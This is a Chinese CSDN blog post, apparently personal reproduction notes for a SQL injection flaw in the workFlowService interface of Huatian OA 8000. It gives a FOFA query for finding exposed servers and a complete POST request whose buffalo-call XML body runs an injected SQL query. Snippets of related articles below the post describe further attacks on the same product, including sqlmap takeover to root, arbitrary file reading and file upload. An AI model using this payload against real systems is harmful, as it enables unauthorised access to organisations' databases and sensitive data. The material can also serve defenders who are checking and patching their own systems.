华天OA漏洞复现手册

最新推荐文章于 2024-04-12 15:16:16 发布
最新推荐文章于 2024-04-12 15:16:16 发布
阅读量5.2k 收藏 2
点赞数 3
分类专栏: 实战漏洞复现 文章标签: 华天OA产品漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41617034/article/details/124305120
版权

前言:华天OA产品漏洞复现笔记,供自己使用,不定期更新
声明:本人所有文章均为技术分享,请勿非法用于其他用途,否则后果自负。

漏洞列表:
华天动力OA 8000版 workFlowService SQL注入漏洞

华天动力OA 8000版 workFlowService SQL注入漏洞

漏洞描述
华天动力OA 8000版 workFlowService接口存在SQL注入漏洞,攻击者通过漏洞可获取数据库敏感信息

漏洞影响
华天动力OA 8000版

网络测绘

app="华天动力-OA8000"

漏洞验证
POC:

POST /OAapp/bfapp/buffalo/workFlowService HTTP/1.1
Host: xx.xx.xx.xx
Accept-Encoding: identity
Content-Length: 103
Accept-Language: zh-CN,zh;q=0.8
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Connection: keep-alive
Cache-Control: max-age=0

<buffalo-call> 
<method>getDataListForTree</method> 
<string>select user()</string> 
</buffalo-call>

在这里插入图片描述

在这里插入图片描述

1stPeak
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
漏洞复现华天动力-OA-hrapplicationformservice-信息泄露
知黑而守白
01-11 355
华天动力OA是一个以技术领先著称的协同软件产品,拥有领先业界的三大核心技术:协同平台、工作流和智能报表,是业内唯一实现协同工具软件、协同应用软件、协同平台融合的协同软件产品,也是业内唯一所有版本统一平台、统一服务、统一升级的协同软件产品华天动力OA系统中的hrApplicationFormService接口存在一个任意文件读取漏洞,攻击者可以通过构造恶意请求,利用该漏洞读取服务器上的任意文件,包括敏感系统文件和应用程序配置文件等。攻击者可能通过利用此漏洞获取敏感信息,导致潜在的信息泄漏风险。
华天动力OA workFlowService SQL注入获得root权限
失心少年
08-04 684
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!发现mysql为root权限,剩下的就简单了,查目录写文件。fofa:app=“华天动力-OA8000”到这里,oa的路径也就得到了,剩下的自由发挥。该命令可查询到mysql按照路径,2、sqlmap梭哈。
华天动力OA-V9说明书
05-30
华天动力OA-V9说明书
华天动力协同OA系统-管理员指导手册.pdf
01-07
华天动力协同OA系统-管理员指导手册.pdf
技术分享 从致远OA-ajax
最新发布
m0_57473261的博客
04-12 514
根据漏洞复现部分,GET请求/seeyon/thirdpartyController.do.css/…POST数据进行任意文件上传,需要带上Content-Type: application/x-www-form-urlencoded,根据返回内容是否包含message、code和details,并且排除返回内容包含-1(上传失败,返回值的code为-1)判断是否上传成功。填写完测试数据后,在自定义PoC的右上角有个"单ip扫描"选项,输入ip:port,进行单ip扫描,查看定义的测试选项逻辑是否正确。
华天动力OA办公系统存在未授权访问漏洞(新)-漏洞挖掘
weixin_43167326的博客
01-20 723
华天动力协同办公系统将先进的管理思想、管理模式和软件技术、网络技术相结合,为用户提供了低成本、高效能的协同办公和管理平台。睿智的管理者通过使用华天动力协同办公平台,在加强规范工作流程、强化团队执行、推动精细管理、促进营业增长等工作中取得了良好的成效。华天动力OA存在未授权访问漏洞,攻击者可以读取用户信息,读取敏感信息等,利用。请自行搭建环境进行漏洞测试,该公众号或作者星球分享的工具、项目、漏洞仅供安全研究与学习之用请勿用于非法行为,如用于其他用途,由使用者承担全部法律及连带责任,与作者和本公众号无关。
华天动力OA8000办公系统存在TemplateService任意文件读取漏洞
wan___she__pi的博客
03-25 205
华天动力OA8000办公系统是一款办公自动化软件,由中国华天动力信息技术有限公司开发和提供。该系统旨在帮助企业实现办公流程的数字化和自动化管理,提高工作效率和信息化水平。
漏洞复现华天动力OA TemplateService接口处存在任意文件读取漏洞
https://blog.echo234.cn/
03-30 341
华天软件有限公司(简称“华天动力”)是国内首批专注于独立OA协同软件研发、为政企提供垂直专业、数智化转型解决方案的科技创新型企业。华天动力OA TemplateService 接口处存在任意文件读取漏洞,攻击者可以利用此漏洞获取系统敏感信息。
复现华天动力OA办公系统 任意文件读取漏洞_62
fushuang333的博客
03-02 970
复现华天动力OA办公系统 任意文件读取漏洞,通过提交专门设计的输入,攻击者就可以在被访问的文件系统中读取或写入任意内容。
华天动力-OA8000 MyHttpServlet 文件上传漏洞复现
0xSec
11-29 1528
华天动力OAMyHttpServlet存在任意文件上传漏洞,未经身份认证的攻击者可上传恶意的raq文件并执行raq文件中的任意sql语句,获取用户账号密码等敏感信息。
漏洞复现】天OA存在任意文件上传漏洞
失心少年
09-08 776
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。华天动力协同办公系统将先进的管理思想、管理模式和软件技术、网络技术相结合,为用户提供了低成本、高效能的协同办公和管理平台。第二步这里,我试了几次没有写成功,可能是post请求body部分哪里没有搞对,有兴趣的可以试一试,成功了告诉我。
华天协同OA系统介绍.docx
05-26
华天协同OA系统介绍
华天动力OA-V6.2 平台版安装使用说明书
05-12
华天动力OA-V6.2 平台版安装使用说明书》 华天动力OA(Office Automation)是一款高效的企业协同办公系统,旨在提升企业的管理效率和团队协作能力。V6.2平台版作为其重要版本,引入了更多先进功能与优化,以适应...
华天动力OA管理员使用手册
09-22
华天动力OA管理员使用手册
华天动力OA TemplateService 任意文件读取漏洞复现
0xSec
12-28 1339
华天动力OA TemplateService接口处存在任意文件读取漏洞,未经身份认证的攻击者可利用此漏洞获取服务器内部敏感文件,使系统处于极不安全的状态。
【1day】华天软件 OAworkFlowService接口SQL注入漏洞学习
记录并分享学习安全的知识点..
12-02 577
华天软件 OA(Office Automation)是华天软件公司开发的一套办公自动化软件解决方案。它旨在帮助企业提高工作效率、优化流程管理,并实现信息化办公;华天软件 OAworkFlowService接口存在接口SQL注入漏洞,攻击者通过在Web应用程序的输入字段中注入恶意的SQL代码,从而在后台数据库中执行未经授权的操作。
华天OA任意文件上传漏洞 复现
薛定谔嘚喵博客
10-09 597
华天动力协同办公系统将先进的管理思想、管理模式和软件技术、网络技术相结合,为用户提供了低成本、高效能的协同办公和管理平台。睿智的管理者通过使用华天动力协同办公平台,在加强规范工作流程、强化团队执行、推动精细管理、促进营业增长等工作中取得了良好的成效。该OA系统存在任意文件上传漏洞,攻击者通过漏洞可以获取服务器的敏感信息。
漏洞复现】用友OA用户信息泄露
失心少年
10-27 325
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!通过该接口可下载oa用户信息文件。
华天动力OA TemplateService接口处存在任意文件读取漏洞
weixin_43167326的博客
03-26 271
华天动力OA是一个以技术领先著称的协同软件产品,拥有领先业界的三大核心技术:协同平台、工作流和智能报表,是业内唯一实现协同工具软件、协同应用软件、协同平台融合的协同软件产品,也是业内唯一所有版本统一平台、统一服务、统一升级的协同软件产品
stc8g工程demo
08-08
STC8G工程demo是指STC8G系列单片机的示例工程代码。STC8G系列是深圳华天润科技有限公司推出的一款高性能、低功耗的8位单片机产品,具有较强的计算能力和丰富的外设资源。 STC8G工程demo通常用于展示STC8G单片机的各种功能和应用场景。这些示例工程代码覆盖了多个领域,包括智能家居、工业自动化、仪器仪表等。通过运行这些demo,开发者可以快速了解STC8G单片机的各项功能,并根据自己的需求进行相应的二次开发。 STC8G工程demo的使用方法通常是将示例代码下载到开发板上,然后通过编译、烧录等步骤进行配置和调试,最终实现相应的功能。这些示例工程代码通常包含了各种常用的外设驱动库,方便开发者进行二次开发。 通过使用STC8G工程demo,开发者可以快速上手STC8G单片机的开发,节省开发时间和成本。同时,这些demo也为开发者提供了丰富的参考,可以借鉴其中的设计思路和代码结构,提高自己的开发能力。 总之,STC8G工程demo是一种非常有价值的资源,能够帮助开发者快速了解和上手STC8G系列单片机,为他们的项目开发提供便利和指导。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

1stPeak

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值